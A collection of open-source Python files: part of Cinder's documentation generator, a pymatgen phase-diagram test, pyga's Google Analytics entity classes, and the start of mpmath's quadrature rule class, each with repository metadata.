return True
return False
def is_module_type(module_str):
"""
Tests whether the filename is a group type
:param module_str:
:return: Boolean
"""
if any([module_str.startswith(prefix) for prefix in config.GROUP_FILE_PREFIXES]):
return True
return False
def process_file(in_path, out_path=None):
""" Generate documentation for a single file
Args:
in_path: The file to process
out_path: The file to save the generated html file to
"""
file_path = in_path
file_prefix = get_file_prefix(file_path)
is_html_file = True if get_file_extension(file_path).lower() == ".html" else False
is_xml_file = True if get_file_extension(file_path).lower() == ".xml" else False
if is_html_file:
file_path = os.sep.join(in_path.split('htmlsrc'+os.sep)[1:])
save_path = out_path if out_path is not None else HTML_DEST_PATH + file_path
else:
save_path = out_path if out_path is not None else HTML_DEST_PATH + get_file_prefix(in_path) + ".html"
if is_html_file:
# print "process: " + HTML_SOURCE_PATH + file_path
process_html_file(HTML_SOURCE_PATH + file_path, save_path)
elif is_xml_file:
file_type = get_file_type(file_prefix)
# process html directory always, since they may generate content for class or namespace reference pages
if not state.processed_html_files and not args.skiphtml:
process_html_dir(HTML_SOURCE_PATH)
process_xml_file_definition(in_path, os.path.join(HTML_DEST_PATH, save_path), file_type)
def process_dir(in_path, out_path):
""" Iterates a directory and generates documentation for each xml file
in the directory as long as it is a class, struct or namespace
Args:
in_path: The directory to process
out_path: The directory to save the generated html file to
"""
for file_path in os.listdir(in_path):
full_path = os.path.join(in_path, file_path)
# if file_path.endswith(".xml"):
if os.path.isfile(full_path):
process_file(full_path)
elif os.path.isdir(full_path):
process_html_dir(full_path)
def process_html_dir(in_path):
global state
for path, subdirs, files in os.walk(in_path):
path_dir = path.split(os.sep)[-1]
if path_dir == "_templates" or path_dir == "assets":
continue
for name in files:
# file_prefix = get_file_prefix(name)
file_ext = get_file_extension(name).lower()
if file_ext == ".html":
if path.endswith(os.sep):
src_path = path[:-1]
else:
src_path = path
src_path = src_path + os.sep + name
process_file(src_path)
# add subnav for all guides that need them
# process_sub_nav()
state.processed_html_files = True
# def copyFiles( HTML_SOURCE_PATH, DOXYGEN_HTML_PATH ):
def copy_files():
src = HTML_SOURCE_PATH
dest = HTML_DEST_PATH
try:
copytree(src, dest, ignore=shutil.ignore_patterns("_templates*", "*.html"))
except OSError as e:
log('Directory not copied. Error:' + str(e))
# from http://stackoverflow.com/a/22331852/680667
def copytree(src, dst, symlinks=False, ignore=None):
""" Copies all of the files from the source directory
to a destination directory. Pass in anything that should be ignored.
"""
if not os.path.exists(dst):
os.makedirs(dst)
shutil.copystat(src, dst)
lst = os.listdir(src)
# make list of files and directories minus the ignored stuff
if ignore:
excl = ignore(src, lst)
lst = [x for x in lst if x not in excl]
for item in lst:
s = os.path.join(src, item)
d = os.path.join(dst, item)
if symlinks and os.path.islink(s):
if os.path.lexists(d):
os.remove(d)
os.symlink(os.readlink(s), d)
try:
st = os.lstat(s)
mode = stat.S_IMODE(st.st_mode)
os.lchmod(d, mode)
except:
pass # lchmod not available
elif os.path.isdir(s):
copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
def load_meta():
global file_meta
# load meta file
meta_file = parse_xml(config.PROJECT_META_FILE)
# get doxygen version
file_meta["doxy_version"] = meta_file.attrib.get("version")
# get cinder version
for member in meta_file.findall(r'compounddef/sectiondef/memberdef[@kind="define"]'):
if member.find(r"name").text == "CINDER_VERSION_STR":
ver = str(member.find(r"initializer").text)
ver = ver.replace('"', "")
file_meta["cinder_version"] = ver
# get docs directory
file_meta["docs_root"] = args.root
# include google analytics
file_meta["include_analytics"] = args.include_analytics
def log(message, level=0, force=False):
if level == 0 or not level:
message_prefix = "INFO"
elif level == 1:
message_prefix = "WARNING"
elif level == 2:
message_prefix = "ERROR"
if args.debug or force:
print("\r *** " + message_prefix + ": [ " + message + " ] ***")
def log_progress(message):
sys.stdout.write('\r' + str(message))
sys.stdout.write("\033[K")
sys.stdout.flush()
if __name__ == "__main__":
""" Main Function for generating html documentation from doxygen generated xml files
Args:
- No arguments generates all Cinder docs. Expects Doxygen to have been run previously.
- Can pass in a single xml file to process by passing in path to xml file
and optionally, the resulting html file.
if no out path is supplied, outputs to DOXYGEN_HTML_PATH
Ex: python xmlToHtml.py xml/classcinder_1_1_surface_t.xml
- Can alternatively pass in a directory to process by providing the xml directory
Ex: python xmlToHtml.py xml/ html/
"""
args = parser.parse_args()
# Make sure we're compiling using python 2.7.6+
version_info = sys.version_info
#if version_info.major >= 2 and version_info.minor >= 7 and version_info.micro < 6:
# sys.exit("ERROR: Sorry buddy, you must use python 2.7.6+ to generate documentation. Visit https://www.python.org/downloads/ to download the latest.")
# if sys.version
if args.path:
inPath = args.path
if not os.path.isfile(inPath) and not os.path.isdir(inPath):
log("Nice try! Directory or file '" + inPath + "' doesn't even exist, so we're going to stop right... now!", True)
quit()
if not os.path.exists(TAG_FILE_PATH):
log("I got nothin' for you. The tag file [" + TAG_FILE_PATH + "] doesn't exist yet. "
"Run Doxygen first and try me again later.", 2, True)
quit()
# load meta data
load_meta()
# Load tag file
log("parsing tag file", 0, True)
g_tag_xml = ET.ElementTree(ET.parse(TAG_FILE_PATH).getroot())
# generate symbol map from tag file
g_symbolMap = get_symbol_to_file_map()
# copy files from htmlsrc/ to html/
log("copying files", 0, True)
copy_files()
# generate namespace navigation
g_namespaceNav = generate_namespace_nav()
log("processing files", 0, True)
if not args.path: # no args; run all docs
# process_html_dir(HTML_SOURCE_PATH, "html/")
process_dir("xml" + os.sep, "html" + os.sep)
# save search index to json file
write_search_index()
log("SUCCESSFULLY GENERATED CINDER DOCS!", 0, True)
elif args.path:
inPath = args.path
# process a specific file
if os.path.isfile(inPath):
process_file(inPath, args.outpath if len(sys.argv) > 2 else None)
log("SUCCESSFULLY GENERATED YOUR FILE!", 0, True)
elif os.path.isdir(inPath):
if inPath == "htmlsrc" + os.sep:
process_html_dir(HTML_SOURCE_PATH)
else:
process_dir(inPath, "html" + os.sep)
log("SUCCESSFULLY GENERATED YOUR FILES!", 0, True)
else:
log("Unknown usage", 1, True)
| 2666hz/Cinder | docs/generateDocs.py | Python | bsd-2-clause | 127,835 | ["VisIt"] | e38e8d2fc92569e2780493242bdaa442e91c5b72eb7cfd018ab147be79d09b5c |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest2 as unittest
import os
from numbers import Number
from pymatgen.core.composition import Composition
from pymatgen.core.periodic_table import Element
from pymatgen.phasediagram.maker import PhaseDiagram
from pymatgen.phasediagram.analyzer import PDAnalyzer
from pymatgen.phasediagram.entries import PDEntryIO, PDEntry
class PDAnalyzerTest(unittest.TestCase):
def setUp(self):
module_dir = os.path.dirname(os.path.abspath(__file__))
(elements, entries) = PDEntryIO.from_csv(os.path.join(module_dir,
"pdentries_test.csv"))
self.pd = PhaseDiagram(entries)
self.analyzer = PDAnalyzer(self.pd)
def test_get_e_above_hull(self):
for entry in self.pd.stable_entries:
self.assertLess(self.analyzer.get_e_above_hull(entry), 1e-11,
"Stable entries should have e above hull of zero!")
for entry in self.pd.all_entries:
if entry not in self.pd.stable_entries:
e_ah = self.analyzer.get_e_above_hull(entry)
self.assertGreaterEqual(e_ah, 0)
self.assertTrue(isinstance(e_ah, Number))
def test_get_equilibrium_reaction_energy(self):
for entry in self.pd.stable_entries:
self.assertLessEqual(
self.analyzer.get_equilibrium_reaction_energy(entry), 0,
"Stable entries should have negative equilibrium reaction energy!")
def test_get_decomposition(self):
for entry in self.pd.stable_entries:
self.assertEqual(len(self.analyzer.get_decomposition(entry.composition)), 1,
"Stable composition should have only 1 decomposition!")
dim = len(self.pd.elements)
for entry in self.pd.all_entries:
ndecomp = len(self.analyzer.get_decomposition(entry.composition))
self.assertTrue(ndecomp > 0 and ndecomp <= dim,
"The number of decomposition phases can at most be equal to the number of components.")
#Just to test decomp for a fictitious composition
ansdict = {entry.composition.formula: amt
for entry, amt in
self.analyzer.get_decomposition(Composition("Li3Fe7O11")).items()}
expected_ans = {"Fe2 O2": 0.0952380952380949,
"Li1 Fe1 O2": 0.5714285714285714,
"Fe6 O8": 0.33333333333333393}
for k, v in expected_ans.items():
self.assertAlmostEqual(ansdict[k], v)
def test_get_transition_chempots(self):
for el in self.pd.elements:
self.assertLessEqual(len(self.analyzer.get_transition_chempots(el)),
len(self.pd.facets))
def test_get_element_profile(self):
for el in self.pd.elements:
for entry in self.pd.stable_entries:
if not (entry.composition.is_element):
self.assertLessEqual(len(self.analyzer.get_element_profile(el, entry.composition)),
len(self.pd.facets))
def test_get_get_chempot_range_map(self):
elements = [el for el in self.pd.elements if el.symbol != "Fe"]
self.assertEqual(len(self.analyzer.get_chempot_range_map(elements)), 10)
def test_getmu_vertices_stability_phase(self):
results = self.analyzer.getmu_vertices_stability_phase(Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(len(results), 6)
test_equality = False
for c in results:
if abs(c[Element("O")]+7.115) < 1e-2 and abs(c[Element("Fe")]+6.596) < 1e-2 and \
abs(c[Element("Li")]+3.931) < 1e-2:
test_equality = True
self.assertTrue(test_equality,"there is an expected vertex missing in the list")
def test_getmu_range_stability_phase(self):
results = self.analyzer.get_chempot_range_stability_phase(
Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(results[Element("O")][1], -4.4501812249999997)
self.assertAlmostEqual(results[Element("Fe")][0], -6.5961470999999996)
self.assertAlmostEqual(results[Element("Li")][0], -3.6250022625000007)
def test_get_hull_energy(self):
for entry in self.pd.stable_entries:
h_e = self.analyzer.get_hull_energy(entry.composition)
self.assertAlmostEqual(h_e, entry.energy)
n_h_e = self.analyzer.get_hull_energy(entry.composition.fractional_composition)
self.assertAlmostEqual(n_h_e, entry.energy_per_atom)
def test_1d_pd(self):
entry = PDEntry('H', 0)
pd = PhaseDiagram([entry])
pda = PDAnalyzer(pd)
decomp, e = pda.get_decomp_and_e_above_hull(PDEntry('H', 1))
self.assertAlmostEqual(e, 1)
self.assertAlmostEqual(decomp[entry], 1.0)
if __name__ == '__main__':
unittest.main()
| aykol/pymatgen | pymatgen/phasediagram/tests/test_pdanalyzer.py | Python | mit | 5,113 | ["pymatgen"] | 61f1b37a49f1e721a0d74ea6e6a513dbfaf1504c246078d65d9fc60e321c23fe |
# -*- coding: utf-8 -*-
from datetime import datetime
from operator import itemgetter
from urlparse import urlparse
from urllib import unquote_plus
from pyga import utils
from pyga import exceptions
__author__ = "Arun KR (kra3) <the1.arun@gmail.com>"
__license__ = "Simplified BSD"
class Campaign(object):
'''
A representation of Campaign
Properties:
_type -- See TYPE_* constants, will be mapped to "__utmz" parameter.
creation_time -- Time of the creation of this campaign, will be mapped to "__utmz" parameter.
response_count -- Response Count, will be mapped to "__utmz" parameter.
Is also used to determine whether the campaign is new or repeated,
which will be mapped to "utmcn" and "utmcr" parameters.
id -- Campaign ID, a.k.a. "utm_id" query parameter for ga.js
Will be mapped to "__utmz" parameter.
source -- Source, a.k.a. "utm_source" query parameter for ga.js.
Will be mapped to "utmcsr" key in "__utmz" parameter.
g_click_id -- Google AdWords Click ID, a.k.a. "gclid" query parameter for ga.js.
Will be mapped to "utmgclid" key in "__utmz" parameter.
d_click_id -- DoubleClick (?) Click ID. Will be mapped to "utmdclid" key in "__utmz" parameter.
name -- Name, a.k.a. "utm_campaign" query parameter for ga.js.
Will be mapped to "utmccn" key in "__utmz" parameter.
medium -- Medium, a.k.a. "utm_medium" query parameter for ga.js.
Will be mapped to "utmcmd" key in "__utmz" parameter.
term -- Terms/Keywords, a.k.a. "utm_term" query parameter for ga.js.
Will be mapped to "utmctr" key in "__utmz" parameter.
content -- Ad Content Description, a.k.a. "utm_content" query parameter for ga.js.
Will be mapped to "utmcct" key in "__utmz" parameter.
'''
TYPE_DIRECT = 'direct'
TYPE_ORGANIC = 'organic'
TYPE_REFERRAL = 'referral'
CAMPAIGN_DELIMITER = '|'
UTMZ_PARAM_MAP = {
'utmcid': 'id',
'utmcsr': 'source',
'utmgclid': 'g_click_id',
'utmdclid': 'd_click_id',
'utmccn': 'name',
'utmcmd': 'medium',
'utmctr': 'term',
'utmcct': 'content',
}
def __init__(self, typ):
self._type = None
self.creation_time = None
self.response_count = 0
self.id = None
self.source = None
self.g_click_id = None
self.d_click_id = None
self.name = None
self.medium = None
self.term = None
self.content = None
if typ:
if typ not in ('direct', 'organic', 'referral'):
raise ValueError('Campaign type has to be one of the Campaign::TYPE_* constant values.')
self._type = typ
if typ == Campaign.TYPE_DIRECT:
self.name = '(direct)'
self.source = '(direct)'
self.medium = '(none)'
elif typ == Campaign.TYPE_REFERRAL:
self.name = '(referral)'
self.medium = 'referral'
elif typ == Campaign.TYPE_ORGANIC:
self.name = '(organic)'
self.medium = 'organic'
else:
self._type = None
self.creation_time = datetime.utcnow()
def validate(self):
if not self.source:
raise exceptions.ValidationError('Campaigns need to have at least the "source" attribute defined.')
@staticmethod
def create_from_referrer(url):
obj = Campaign(Campaign.TYPE_REFERRAL)
parse_rslt = urlparse(url)
obj.source = parse_rslt.netloc
obj.content = parse_rslt.path
return obj
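# e.g. (hypothetical url):
#   c = Campaign.create_from_referrer('http://www.example.com/some/page')
#   c.source  -> 'www.example.com'
#   c.content -> '/some/page'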
def extract_from_utmz(self, utmz):
parts = utmz.split('.', 4)
if len(parts) != 5:
raise ValueError('The given "__utmz" cookie value is invalid.')
self.creation_time = utils.convert_ga_timestamp(parts[1])
self.response_count = int(parts[3])
params = parts[4].split(Campaign.CAMPAIGN_DELIMITER)
for param in params:
key, val = param.split('=')
try:
setattr(self, self.UTMZ_PARAM_MAP[key], unquote_plus(val))
except KeyError:
continue
return self
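# Illustrative "__utmz" value (domain hash . timestamp . session count .
# response count . campaign data, field names as this class uses them):
#   '12345.1331590154.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=python'
# would set creation_time from the timestamp, response_count to 1, and map
# utmcsr/utmccn/utmcmd/utmctr onto source/name/medium/term via UTMZ_PARAM_MAP.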
class CustomVariable(object):
'''
Represent a Custom Variable
Properties:
index -- Is the slot, you have 5 slots
name -- Name given to custom variable
value -- Value for the variable
scope -- Scope can be any one of 1, 2 or 3.
WATCH OUT: It's a known issue that GA will not decode URL-encoded
characters in custom variable names and values properly, so spaces
will show up as "%20" in the interface etc. (applicable to name & value)
http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=2cdb3ec0be32e078
'''
SCOPE_VISITOR = 1
SCOPE_SESSION = 2
SCOPE_PAGE = 3
def __init__(self, index=None, name=None, value=None, scope=3):
self.index = index
self.name = name
self.value = value
self.scope = CustomVariable.SCOPE_PAGE
if scope:
self.scope = scope
def __setattr__(self, name, value):
if name == 'scope':
if value and value not in range(1, 4):
raise ValueError('Custom Variable scope has to be one of 1, 2 or 3.')
if name == 'index':
# Custom Variables are limited to five slots officially, but there seems to be a
# trick to allow for more of them which we could investigate at a later time (see
# http://analyticsimpact.com/2010/05/24/get-more-than-5-custom-variables-in-google-analytics/
if value and (value < 0 or value > 5):
raise ValueError('Custom Variable index has to be between 1 and 5.')
object.__setattr__(self, name, value)
def validate(self):
'''
According to the GA documentation, there is a limit to the combined size of
name and value of 64 bytes after URL encoding,
see http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html#varTypes
and http://xahlee.org/js/google_analytics_tracker_2010-07-01_expanded.js line 563
This limit was increased to 128 bytes BEFORE encoding with the 2012-01 release of ga.js however,
see http://code.google.com/apis/analytics/community/gajs_changelog.html
'''
if len('%s%s' % (self.name, self.value)) > 128:
raise exceptions.ValidationError('Custom Variable combined name and value length must not be larger than 128 bytes.')
class Event(object):
'''
Represents an Event
http://code.google.com/apis/analytics/docs/tracking/eventTrackerOverview.html
Properties:
category -- The general event category
action -- The action for the event
label -- An optional descriptor for the event
value -- An optional value associated with the event. You can see your
event values in the Overview, Categories, and Actions reports,
where they are listed by event or aggregated across events,
depending upon your report view.
noninteraction -- By default, event hits will impact a visitor's bounce rate.
By setting this parameter to true, this event hit
will not be used in bounce rate calculations.
(default False)
'''
def __init__(self, category=None, action=None, label=None, value=None, noninteraction=False):
self.category = category
self.action = action
self.label = label
self.value = value
self.noninteraction = bool(noninteraction)
if self.noninteraction and not self.value:
self.value = 0
def validate(self):
if not(self.category and self.action):
raise exceptions.ValidationError('Events need to have at least a category and an action defined.')
class Item(object):
'''
Represents an Item in Transaction
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
sku -- Product Code. This is the sku code for a given product, will be mapped to "utmipc" parameter
name -- Product Name, will be mapped to "utmipn" parameter
variation -- Variations on an item, will be mapped to "utmiva" parameter
price -- Unit Price. Value is set to numbers only, will be mapped to "utmipr" parameter
quantity -- Unit Quantity, will be mapped to "utmiqt" parameter
'''
def __init__(self):
self.order_id = None
self.sku = None
self.name = None
self.variation = None
self.price = None
self.quantity = 1
def validate(self):
if not self.sku:
raise exceptions.ValidationError('sku/product is a required parameter')
class Page(object):
'''
Contains all parameters needed for tracking a page
Properties:
path -- Page request URI, will be mapped to "utmp" parameter
title -- Page title, will be mapped to "utmdt" parameter
charset -- Charset encoding, will be mapped to "utmcs" parameter
referrer -- Referer URL, will be mapped to "utmr" parameter
load_time -- Page load time in milliseconds, will be encoded into "utme" parameter.
'''
REFERRER_INTERNAL = '0'
def __init__(self, path):
self.path = None
self.title = None
self.charset = None
self.referrer = None
self.load_time = None
if path:
self.path = path
def __setattr__(self, name, value):
if name == 'path':
if value and value != '':
if value[0] != '/':
raise ValueError('The page path should always start with a slash ("/").')
elif name == 'load_time':
if value and not isinstance(value, int):
raise ValueError('Page load time must be specified in integer milliseconds.')
object.__setattr__(self, name, value)
class Session(object):
'''
You should serialize this object and store it in the user session to keep it
persistent between requests (similar to the "__umtb" cookie of the GA Javascript client).
Properties:
session_id -- A unique per-session ID, will be mapped to "utmhid" parameter
track_count -- The amount of pageviews that were tracked within this session so far,
will be part of the "__utmb" cookie parameter.
Will get incremented automatically upon each request
start_time -- Timestamp of the start of this new session, will be part of the "__utmb" cookie parameter
'''
def __init__(self):
self.session_id = utils.get_32bit_random_num()
self.track_count = 0
self.start_time = datetime.utcnow()
@staticmethod
def generate_session_id():
return utils.get_32bit_random_num()
def extract_from_utmb(self, utmb):
'''
Will extract information for the "trackCount" and "startTime"
properties from the given "__utmb" cookie value.
'''
parts = utmb.split('.')
if len(parts) != 4:
raise ValueError('The given "__utmb" cookie value is invalid.')
self.track_count = int(parts[1])
self.start_time = utils.convert_ga_timestamp(parts[3])
return self
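# Hedged sketch of restoring a Session from a "__utmb" cookie value; the
# 4-part value below is a made-up example of the expected format.
def _example_session_from_utmb():
    session = Session()
    session.extract_from_utmb('123456789.5.10.1360432486')
    return session.track_count, session.start_time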
class SocialInteraction(object):
'''
Properties:
action -- Required. A string representing the social action being tracked,
will be mapped to "utmsa" parameter
network -- Required. A string representing the social network being tracked,
will be mapped to "utmsn" parameter
target -- Optional. A string representing the URL (or resource) which receives the action.
'''
def __init__(self, action=None, network=None, target=None):
self.action = action
self.network = network
self.target = target
def validate(self):
if not(self.action and self.network):
raise exceptions.ValidationError('Social interactions need to have at least the "network" and "action" attributes defined.')
class Transaction(object):
'''
Represents parameters for a Transaction call
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
affiliation -- Affiliation, Will be mapped to "utmtst" parameter
total -- Total Cost, will be mapped to "utmtto" parameter
tax -- Tax Cost, will be mapped to "utmttx" parameter
shipping -- Shipping Cost, values as for unit and price, will be mapped to "utmtsp" parameter
city -- Billing City, will be mapped to "utmtci" parameter
state -- Billing Region, will be mapped to "utmtrg" parameter
country -- Billing Country, will be mapped to "utmtco" parameter
items -- @entity.Items in a transaction
'''
def __init__(self):
self.items = []
self.order_id = None
self.affiliation = None
self.total = None
self.tax = None
self.shipping = None
self.city = None
self.state = None
self.country = None
def __setattr__(self, name, value):
if name == 'order_id':
for itm in self.items:
itm.order_id = value
object.__setattr__(self, name, value)
def validate(self):
if len(self.items) == 0:
            raise exceptions.ValidationError('Transactions need to consist of at least one item.')
def add_item(self, item):
''' item of type entities.Item '''
if isinstance(item, Item):
item.order_id = self.order_id
self.items.append(item)
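# Hedged sketch of assembling a Transaction; the SKU, price and order ID
# are illustrative values only.
def _example_transaction():
    item = Item()
    item.sku = 'SKU-1'
    item.price = 9.99
    transaction = Transaction()
    transaction.order_id = '1234'
    transaction.add_item(item)
    transaction.validate()  # passes: at least one item is present
    return transaction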
class Visitor(object):
'''
You should serialize this object and store it in the user database to keep it
    persistent for the same user permanently (similar to the "__utma" cookie of
the GA Javascript client).
Properties:
unique_id -- Unique user ID, will be part of the "__utma" cookie parameter
first_visit_time -- Time of the very first visit of this user, will be part of the "__utma" cookie parameter
previous_visit_time -- Time of the previous visit of this user, will be part of the "__utma" cookie parameter
current_visit_time -- Time of the current visit of this user, will be part of the "__utma" cookie parameter
visit_count -- Amount of total visits by this user, will be part of the "__utma" cookie parameter
ip_address -- IP Address of the end user, will be mapped to "utmip" parameter and "X-Forwarded-For" request header
user_agent -- User agent string of the end user, will be mapped to "User-Agent" request header
locale -- Locale string (country part optional) will be mapped to "utmul" parameter
    flash_version -- Visitor's Flash version, will be mapped to "utmfl" parameter
java_enabled -- Visitor's Java support, will be mapped to "utmje" parameter
screen_colour_depth -- Visitor's screen color depth, will be mapped to "utmsc" parameter
screen_resolution -- Visitor's screen resolution, will be mapped to "utmsr" parameter
'''
def __init__(self):
now = datetime.utcnow()
self.unique_id = None
self.first_visit_time = now
self.previous_visit_time = now
self.current_visit_time = now
self.visit_count = 1
self.ip_address = None
self.user_agent = None
self.locale = None
self.flash_version = None
self.java_enabled = None
self.screen_colour_depth = None
self.screen_resolution = None
def __setattr__(self, name, value):
if name == 'unique_id':
            if value is not None and (value < 0 or value > 0x7fffffff):
raise ValueError('Visitor unique ID has to be a 32-bit integer between 0 and 0x7fffffff')
object.__setattr__(self, name, value)
def __getattribute__(self, name):
if name == 'unique_id':
tmp = object.__getattribute__(self, name)
if tmp is None:
self.unique_id = self.generate_unique_id()
return object.__getattribute__(self, name)
def __getstate__(self):
state = self.__dict__
        if state.get('unique_id') is None:
            state['unique_id'] = self.generate_unique_id()
return state
def extract_from_utma(self, utma):
'''
Will extract information for the "unique_id", "first_visit_time", "previous_visit_time",
"current_visit_time" and "visit_count" properties from the given "__utma" cookie value.
'''
parts = utma.split('.')
if len(parts) != 6:
raise ValueError('The given "__utma" cookie value is invalid.')
self.unique_id = int(parts[1])
self.first_visit_time = utils.convert_ga_timestamp(parts[2])
self.previous_visit_time = utils.convert_ga_timestamp(parts[3])
self.current_visit_time = utils.convert_ga_timestamp(parts[4])
self.visit_count = int(parts[5])
return self
def extract_from_server_meta(self, meta):
'''
Will extract information for the "ip_address", "user_agent" and "locale"
properties from the given WSGI REQUEST META variable or equivalent.
'''
if 'REMOTE_ADDR' in meta and meta['REMOTE_ADDR']:
ip = None
for key in ('HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'):
if key in meta and not ip:
ips = meta.get(key, '').split(',')
                    ip = ips[-1].strip()
if not utils.is_valid_ip(ip):
ip = ''
if utils.is_private_ip(ip):
ip = ''
if ip:
self.ip_address = ip
if 'HTTP_USER_AGENT' in meta and meta['HTTP_USER_AGENT']:
self.user_agent = meta['HTTP_USER_AGENT']
if 'HTTP_ACCEPT_LANGUAGE' in meta and meta['HTTP_ACCEPT_LANGUAGE']:
user_locals = []
matched_locales = utils.validate_locale(meta['HTTP_ACCEPT_LANGUAGE'])
if matched_locales:
                lang_lst = [i[1].replace('-', '_') for i in matched_locales]
                quality_lst = [float(i[4] or '0') or 1.0 for i in matched_locales]
                lang_quality_map = zip(lang_lst, quality_lst)
user_locals = [x[0] for x in sorted(lang_quality_map, key=itemgetter(1), reverse=True)]
if user_locals:
self.locale = user_locals[0]
return self
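    # Hedged sketch: both extractors return self, so they can be chained.
    # The cookie value and the WSGI-style META dict are illustrative only:
    #   visitor = Visitor()
    #   visitor.extract_from_utma('1.1234567890.1360432486.1360432486.1360432486.2')
    #   visitor.extract_from_server_meta({
    #       'REMOTE_ADDR': '203.0.113.7',
    #       'HTTP_USER_AGENT': 'Mozilla/5.0',
    #       'HTTP_ACCEPT_LANGUAGE': 'en-US,en;q=0.8',
    #   })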
def generate_hash(self):
'''Generates a hashed value from user-specific properties.'''
tmpstr = "%s%s%s" % (self.user_agent, self.screen_resolution, self.screen_colour_depth)
return utils.generate_hash(tmpstr)
def generate_unique_id(self):
'''Generates a unique user ID from the current user-specific properties.'''
return ((utils.get_32bit_random_num() ^ self.generate_hash()) & 0x7fffffff)
def add_session(self, session):
'''
Updates the "previousVisitTime", "currentVisitTime" and "visitCount"
fields based on the given session object.
'''
start_time = session.start_time
if start_time != self.current_visit_time:
self.previous_visit_time = self.current_visit_time
self.current_visit_time = start_time
self.visit_count = self.visit_count + 1
|
steeve/xbmctorrent
|
resources/site-packages/pyga/entities.py
|
Python
|
gpl-3.0
| 19,442
|
[
"VisIt"
] |
d8583aa567224e7f1335578a93c62c2898c60fdd3ab68e3c81c6676f340c3fb4
|
import math
from ..libmp.backend import xrange
class QuadratureRule(object):
"""
Quadrature rules are implemented using this class, in order to
simplify the code and provide a common infrastructure
for tasks such as error estimation and node caching.
You can implement a custom quadrature rule by subclassing
:class:`QuadratureRule` and implementing the appropriate
methods. The subclass can then be used by :func:`~mpmath.quad` by
passing it as the *method* argument.
:class:`QuadratureRule` instances are supposed to be singletons.
:class:`QuadratureRule` therefore implements instance caching
in :func:`~mpmath.__new__`.
"""
def __init__(self, ctx):
self.ctx = ctx
self.standard_cache = {}
self.transformed_cache = {}
self.interval_count = {}
def clear(self):
"""
Delete cached node data.
"""
self.standard_cache = {}
self.transformed_cache = {}
self.interval_count = {}
def calc_nodes(self, degree, prec, verbose=False):
r"""
Compute nodes for the standard interval `[-1, 1]`. Subclasses
should probably implement only this method, and use
:func:`~mpmath.get_nodes` method to retrieve the nodes.
"""
raise NotImplementedError
def get_nodes(self, a, b, degree, prec, verbose=False):
"""
Return nodes for given interval, degree and precision. The
nodes are retrieved from a cache if already computed;
otherwise they are computed by calling :func:`~mpmath.calc_nodes`
and are then cached.
Subclasses should probably not implement this method,
but just implement :func:`~mpmath.calc_nodes` for the actual
node computation.
"""
key = (a, b, degree, prec)
if key in self.transformed_cache:
return self.transformed_cache[key]
orig = self.ctx.prec
try:
self.ctx.prec = prec+20
# Get nodes on standard interval
if (degree, prec) in self.standard_cache:
nodes = self.standard_cache[degree, prec]
else:
nodes = self.calc_nodes(degree, prec, verbose)
self.standard_cache[degree, prec] = nodes
# Transform to general interval
nodes = self.transform_nodes(nodes, a, b, verbose)
if key in self.interval_count:
self.transformed_cache[key] = nodes
else:
self.interval_count[key] = True
finally:
self.ctx.prec = orig
return nodes
def transform_nodes(self, nodes, a, b, verbose=False):
r"""
Rescale standardized nodes (for `[-1, 1]`) to a general
interval `[a, b]`. For a finite interval, a simple linear
change of variables is used. Otherwise, the following
transformations are used:
.. math ::
[a, \infty] : t = \frac{1}{x} + (a-1)
[-\infty, b] : t = (b+1) - \frac{1}{x}
[-\infty, \infty] : t = \frac{x}{\sqrt{1-x^2}}
"""
ctx = self.ctx
a = ctx.convert(a)
b = ctx.convert(b)
one = ctx.one
if (a, b) == (-one, one):
return nodes
half = ctx.mpf(0.5)
new_nodes = []
if ctx.isinf(a) or ctx.isinf(b):
if (a, b) == (ctx.ninf, ctx.inf):
p05 = -half
for x, w in nodes:
x2 = x*x
px1 = one-x2
spx1 = px1**p05
x = x*spx1
w *= spx1/px1
new_nodes.append((x, w))
elif a == ctx.ninf:
b1 = b+1
for x, w in nodes:
u = 2/(x+one)
x = b1-u
w *= half*u**2
new_nodes.append((x, w))
elif b == ctx.inf:
a1 = a-1
for x, w in nodes:
u = 2/(x+one)
x = a1+u
w *= half*u**2
new_nodes.append((x, w))
elif a == ctx.inf or b == ctx.ninf:
return [(x,-w) for (x,w) in self.transform_nodes(nodes, b, a, verbose)]
else:
raise NotImplementedError
else:
# Simple linear change of variables
C = (b-a)/2
D = (b+a)/2
for x, w in nodes:
new_nodes.append((D+C*x, C*w))
return new_nodes
def guess_degree(self, prec):
"""
Given a desired precision `p` in bits, estimate the degree `m`
of the quadrature required to accomplish full accuracy for
typical integrals. By default, :func:`~mpmath.quad` will perform up
to `m` iterations. The value of `m` should be a slight
overestimate, so that "slightly bad" integrals can be dealt
with automatically using a few extra iterations. On the
other hand, it should not be too big, so :func:`~mpmath.quad` can
quit within a reasonable amount of time when it is given
an "unsolvable" integral.
The default formula used by :func:`~mpmath.guess_degree` is tuned
for both :class:`TanhSinh` and :class:`GaussLegendre`.
The output is roughly as follows:
+---------+---------+
| `p` | `m` |
+=========+=========+
| 50 | 6 |
+---------+---------+
| 100 | 7 |
+---------+---------+
| 500 | 10 |
+---------+---------+
| 3000 | 12 |
+---------+---------+
This formula is based purely on a limited amount of
experimentation and will sometimes be wrong.
"""
# Expected degree
# XXX: use mag
g = int(4 + max(0, self.ctx.log(prec/30.0, 2)))
# Reasonable "worst case"
g += 2
return g
def estimate_error(self, results, prec, epsilon):
r"""
Given results from integrations `[I_1, I_2, \ldots, I_k]` done
with a quadrature of rule of degree `1, 2, \ldots, k`, estimate
the error of `I_k`.
For `k = 2`, we estimate `|I_{\infty}-I_2|` as `|I_2-I_1|`.
For `k > 2`, we extrapolate `|I_{\infty}-I_k| \approx |I_{k+1}-I_k|`
from `|I_k-I_{k-1}|` and `|I_k-I_{k-2}|` under the assumption
that each degree increment roughly doubles the accuracy of
the quadrature rule (this is true for both :class:`TanhSinh`
and :class:`GaussLegendre`). The extrapolation formula is given
by Borwein, Bailey & Girgensohn. Although not very conservative,
this method seems to be very robust in practice.
"""
if len(results) == 2:
return abs(results[0]-results[1])
try:
if results[-1] == results[-2] == results[-3]:
return self.ctx.zero
